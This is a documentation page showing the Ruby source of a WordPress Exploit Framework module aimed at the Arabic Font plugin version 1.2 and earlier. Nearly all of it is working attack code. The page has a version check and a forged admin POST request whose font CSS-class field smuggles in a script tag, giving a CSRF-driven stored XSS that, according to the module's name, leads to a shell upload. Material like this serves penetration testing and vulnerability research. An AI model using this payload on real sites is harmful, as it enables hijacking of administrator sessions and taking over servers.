class Wpxf::Exploit::ArabicFontCsrfStoredXssShellUpload

Public Class Methods

new() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Arabic Font <= 1.2 CSRF Stored XSS Shell Upload',
    author: [
      'rastating'  # Discovery + WPXF module
    ],
    references: [
      ['WPVDB', '8868'],
      ['URL', 'https://www.rastating.com/arabic-font-1-2-csrf-stored-xss']
    ],
    date: 'Jul 18 2017'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 22
def check
  check_plugin_version_from_readme('arabic-font', '1.2.1')
end
initial_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 26
def initial_script
  create_basic_post_script(
    normalize_uri(wordpress_url_admin, 'admin.php?page=arabic-font%2Finc%2Finit.php'),
    'save1'              => 'Save changes',
    'AF_fontfamily'      => 'JF Flat Jozoor',
    'AF_fontsize'        => '18',
    'AF_lineheight'      => '45',
    'AF_textalign'       => 'Center',
    'AF_defaultcssclass' => ".arab\\\"><script>#{xss_ascii_encoded_include_script}<\\/script><input+type=\\\"hidden\\\"+value=\\\"",
    'AF_customcss'       => '',
    'action'             => 'save'
  )
end